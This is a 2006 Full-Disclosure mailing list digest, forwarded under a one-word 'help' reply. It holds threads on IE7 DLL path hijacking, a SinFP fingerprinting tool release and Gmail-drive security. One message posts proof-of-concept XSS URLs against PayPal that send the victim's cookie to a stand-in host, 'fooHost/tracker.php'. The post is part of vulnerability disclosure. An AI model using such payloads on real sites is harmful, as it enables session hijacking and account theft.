help

[Fig <digital.figlet () gmail com>]

help

On 11/6/06, full-disclosure-request () lists grok org uk
<full-disclosure-request () lists grok org uk> wrote:
> Send Full-Disclosure mailing list submissions to
>       full-disclosure () lists grok org uk
>
> To subscribe or unsubscribe via the World Wide Web, visit
>       https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
>       full-disclosure-request () lists grok org uk
>
> You can reach the person managing the list at
>       full-disclosure-owner () lists grok org uk
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Note to digest recipients - when replying to digest posts, please trim your
> post appropriately. Thank you.
>
>
> Today's Topics:
>
>    1. Re: Internet Explorer 7 - Still Spyware Writers'        Heaven
>       (Joshua Gimer)
>    2. SinFP 2.04 release, works under Windows (GomoR)
>    3. Re: Mail Drives Security Considerations (gabriel rosenkoetter)
>    4. Re: alert() (Matthew Flaschen)
>    5. Re: Mail Drives Security Considerations (Darkz)
>    6. Re: Internet Explorer 7 - Still Spyware Writers'        Heaven
>       (Roger A. Grimes)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sat, 4 Nov 2006 13:15:35 -0700
> From: "Joshua Gimer" <jgimer () gmail com>
> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware
>       Writers'        Heaven
> To: "Eliah Kagan" <degeneracypressure () gmail com>
> Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com
> Message-ID:
>       <cf939bff0611041215u28faffd5j211562633f7a9b3d () mail gmail com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> If Microsoft is not planning on providing a fix for this until Vista, I can
> see a worm coming from this. Forgive me if I don't know how this works in
> the windows world, but when it is looking for this DLL, does it take the
> first one that it finds within your path; like in UNIX? Or does it look in
> all directories within your path and then decide? I am guessing the former,
> but I am just clarifying.
>
> On 11/3/06, Eliah Kagan <degeneracypressure () gmail com> wrote:
> > On 11/2/06, Roger A. Grimes wrote:
> > > So, if you're statement is accurate that malware would need to be placed
> > > in a directory identified by the PATH statement, we can relax because
> > > that would require Administrator access to pull off. Admin access would
> > > be needed to modify the PATH statement appropriately to include the
> > > user's desktop or some other new user writable location or Admin access
> > > would be needed to copy a file into the locations indicated by the
> > > default PATH statement.
> >
> > It would not require *administrator* access--non-administrator users
> > can still add things to their own PATHs, just not to the universal,
> > system PATH. (See Control Panel > System > Advanced > Environment
> > Variables.)
> >
> > -Eliah
>
>
>
> --
> Thx
> Joshua Gimer
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061104/b97c9d1d/attachment-0001.html
>
> ------------------------------
>
> Message: 2
> Date: Sun, 5 Nov 2006 20:02:28 +0100
> From: GomoR <fd () gomor org>
> Subject: [Full-disclosure] SinFP 2.04 release, works under Windows
> To: full-disclosure () lists grok org uk
> Message-ID: <20061105190228.GD23011 () oshima enslaved lan>
> Content-Type: text/plain; charset=us-ascii
>
> Hi,
>
> I'm pleased to announce the availability of SinFP 2.04, which now can
> run under Windows ActivePerl.
>
> SinFP is a new approach to active and passive OS fingerprinting, you can
> know more about its features here:
> http://www.gomor.org/sinfp
>
> SinFP has now more than 130 signatures in its database.
>
> To be informed about new signature files, subscribe to:
> http://lists.sourceforge.net/lists/listinfo/sinfp-discuss
>
> Installation instruction can be found here:
> http://www.gomor.org/cgi-bin/index.pl?mode=view;page=sinfp#3
>
> For Windows users, follow these instructions:
>
>   This was tested with ActivePerl 5.8.8.819, with PPM v4.0.
>
>   # If you are behind a proxy:
>   C:\> set http_proxy=http://username:password@proxy:port
>
>   # Add gomor repository
>   C:\> ppm repo add gomor http://www.gomor.org/files/ppm/repo-8xx
>
>   # Disable all other repo, if you have many. Or only ActiveState repo
>   # by default
>   C:\> ppm repo 1 off
>   ...
>   C:\> ppm install Net-SinFP
>
>   # Re-enable all other repo
>   C:\> ppm repo 1 on
>   ...
>
>   Launch it:
>   C:\> perl C:\perl\site\bin\sinfp.pl
>
>   If you have error messages about failing to load some .dll, go to
>   www.microsoft.com. Then, in the search field, type in vcredist_x86.exe,
>   download it and install it.
>
> Please, do not hesitate to submit new signatures to sinfp_at_gomor.org,
> or on the mailing list.
>
> Best regards,
>
> --
>   ^  ___  ___             http://www.GomoR.org/          <-+
>   | / __ |__/          Systems & Security Engineer         |
>   | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
>   +-->  Net::Packet <=> http://search.cpan.org/~gomor/  <--+
>
>
>
> ------------------------------
>
> Message: 3
> Date: Sun, 5 Nov 2006 18:18:10 -0500
> From: gabriel rosenkoetter <gr () eclipsed net>
> Subject: Re: [Full-disclosure] Mail Drives Security Considerations
> To: full-disclosure () lists grok org uk
> Message-ID: <20061105231810.GD36176 () stow eclipsed net>
> Content-Type: text/plain; charset="us-ascii"
>
> On Fri, Nov 03, 2006 at 11:28:27AM -0500, Matthew Flaschen wrote:
> > Why can't message signing offer backwards compatibility (assuming you
> > use multipart/signed)?
>
> Seems to me that adding a PGP signature verification to every
> operation on files (even ls(1); you have to check to make sure it's
> not a spoofed file) would rather noticeably impact the
> performance of what's already got to be pretty slow on most users'
> connections, and it adds a layer of complexity to the setup (you
> have to generate the key pair, and have the private key available on
> any system which you intend have write access) but that would certainly
> work. Spam will still be a DoS against storage space, of course.
>
> Never mind that this software violates gmail's acceptable use
> policy and is transmitted back and forth in the clear (unless you
> want to roll PGP encryption into the mix, in which case keeping
> paths in the clear in the subject breaks the security), so it'd be
> hard to view data stored this way as being "secure" to begin with...
>
> --
> gabriel rosenkoetter
> gr () eclipsed net
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 189 bytes
> Desc: not available
> Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/669fedd5/attachment-0001.bin
>
> ------------------------------
>
> Message: 4
> Date: Sun, 05 Nov 2006 22:24:25 -0500
> From: Matthew Flaschen <matthew.flaschen () gatech edu>
> Subject: Re: [Full-disclosure] alert()
> To: Matthew Flaschen <matthew.flaschen () gatech edu>
> Cc: full-disclosure () lists grok org uk, spoof () paypal com
> Message-ID: <454EAAE9.9030500 () gatech edu>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hmm, I got an email from Paypal, saying
>
> "Thank you for bringing this incident of suspicious activity to our
> attention. PayPal will investigate this activity immediately and contact
> you further if any additional information is required.[...]"
>
> I'm fairly certain they're referring to this exploit, which I CCed them
> on my previous post.
>
> Also, the POC I posted no longer works.  It looks like Paypal is no
> longer unescaping double quotation marks.  Thus, the script fails to
> append the cookie.  At any rate, just changing the double quotes to
> single quotes makes the POC work again:
>
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location='http://fooHost/tracker.php?'%2Bdocument.cookie
>
> Matt Flaschen
>
> Matthew Flaschen wrote:
> > Good find.  How about using it to steal the entire PayPal cookie, though:
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie;
> > auto113922 () hush ai wrote:
> > > https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-
> > > outside&voice=javascript:document.write('heh');alert('bl00p');
> > >
> > >
> > >
> > > Concerned about your privacy? Instantly send FREE secure email, no
> account required
> > > http://www.hushmail.com/send?l=480
> > >
> > > Get the best prices on SSL certificates from Hushmail
> > > https://www.hushssl.com?l=485
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 250 bytes
> Desc: OpenPGP digital signature
> Url :
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061105/e53d7a03/attachment-0001.bin
>
> ------------------------------
>
> Message: 5
> Date: Mon, 06 Nov 2006 10:36:10 +0200
> From: Darkz <darkz.gsa () gmail com>
> Subject: Re: [Full-disclosure] Mail Drives Security Considerations
> To: Matthew Flaschen <matthew.flaschen () gatech edu>,
>       full-disclosure () lists grok org uk
> Message-ID: <454EF3FA.6040409 () gmail com>
> Content-Type: text/plain; charset="us-ascii"
>
> An HTML attachment was scrubbed...
> URL:
> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061106/76d0ca99/attachment-0001.html
>
> ------------------------------
>
> Message: 6
> Date: Sun, 5 Nov 2006 22:35:25 -0500
> From: "Roger A. Grimes" <roger () banneretcs com>
> Subject: Re: [Full-disclosure] Internet Explorer 7 - Still Spyware
>       Writers'        Heaven
> To: "Eliah Kagan" <degeneracypressure () gmail com>,
>       <full-disclosure () lists grok org uk>, <bugtraq () securityfocus com>
> Message-ID:
>       <096A04F511B7FD4995AE55F13824B8331983BB () banneretcs1 local banneretcs com>
>       
> Content-Type: text/plain;     charset="us-ascii"
>
> So all the malware writer has to do now is figure out how to do the
> initial exploit in the first place, that would then allow them to muck
> with path statements or place code in path executable areas. I mean, do
> you get it, yet? If the malware writer figures out how do the initial
> exploit, anything can be done, not just the path tricks.
>
> My WhereWindowsMalwareHides
> document(http://weblog.infoworld.com/securityadviser/archives/2006/05/up
> dated_where_w.html)contains over 145 different tricks and locations
> where malware can hide and live, along with the path trick. Your point
> is a valid point, but it's been a known issue for years.
>
> You can't skip over the hardest part, the initial exploit, and start
> picking on one of over a hundred ways to muck with Windows users and
> call "IE 7 a Spyware Writer's Heaven". I mean you can, but it looks like
> you're grasping at straws. At least tell us something new, and not
> something that's been documented for years.
>
> Roger
>
> -----Original Message-----
> From: Eliah Kagan [mailto:degeneracypressure () gmail com]
> Sent: Friday, November 03, 2006 9:26 PM
> To: full-disclosure () lists grok org uk; bugtraq () securityfocus com
> Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven
>
> On 11/2/06, Roger A. Grimes wrote:
> > So, if you're statement is accurate that malware would need to be
> > placed in a directory identified by the PATH statement, we can relax
> > because that would require Administrator access to pull off. Admin
> > access would be needed to modify the PATH statement appropriately to
> > include the user's desktop or some other new user writable location or
>
> > Admin access would be needed to copy a file into the locations
> > indicated by the default PATH statement.
>
> It would not require *administrator* access--non-administrator users can
> still add things to their own PATHs, just not to the universal, system
> PATH. (See Control Panel > System > Advanced > Environment
> Variables.)
>
> -Eliah
>
>
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> End of Full-Disclosure Digest, Vol 21, Issue 9
> **********************************************

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/